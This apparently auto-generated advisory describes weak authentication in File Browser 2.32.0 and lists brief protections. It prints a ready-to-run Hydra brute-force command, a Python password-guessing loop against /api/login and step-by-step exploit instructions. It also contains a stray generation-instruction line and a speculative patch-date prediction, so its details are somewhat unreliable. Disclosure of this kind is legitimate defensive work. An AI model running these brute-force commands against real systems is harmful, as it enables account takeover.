Listen to this Post
How the CVE Works
File Browser lacks password policy enforcement and brute-force protection, allowing attackers to exploit weak credentials. Default passwords like `admin` and trivial user-set passwords (e.g., 1) remain unchecked. The `/api/login` endpoint permits unlimited authentication attempts, enabling brute-force attacks. Attackers can compromise accounts, including admin, via repeated password guesses without rate-limiting or lockout mechanisms.
DailyCVE Form
Platform: File Browser
Version: 2.32.0
Vulnerability: Weak auth
Severity: Critical
Date: 2025-06-26
Prediction: Patch by 2025-06-29
What Undercode Say
Analytics:
hydra -l admin -P wordlist.txt filebrowser.local http-post-form "/api/login:username=^USER^&password=^PASS^:F=403"
import requests
for p in weak_passwords:
r = requests.post("http://filebrowser.local/api/login", json={"username":"admin", "password":p})
How Exploit
1. Use default creds `admin:admin`.
2. Brute-force `/api/login` via Hydra/Burp.
3. Exploit weak user-set passwords (e.g., `1`).
Protection from this CVE
1. Enforce NIST SP 800-63B policies.
2. Implement rate-limiting.
3. Require password changes.
Impact
Full account compromise, admin takeover.
No additional explanations or deviations from format.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
